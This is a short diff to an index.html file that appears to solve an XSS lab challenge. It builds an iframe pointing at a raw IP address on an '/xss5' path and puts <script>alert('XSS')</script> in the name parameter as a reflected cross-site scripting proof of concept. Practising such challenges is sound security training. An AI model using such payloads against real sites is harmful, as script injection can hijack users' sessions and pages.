--- a/index.html
+++ b/index.html
@@ -1,3 +1,2 @@
-<iframe src=http://54.37.156.50:5000/xss5?name
-<script>alert('XSS')</script>
+<iframe src=http://54.37.156.50:5000/xss5?name=<script>alert('XSS')</script>
 </iframe>
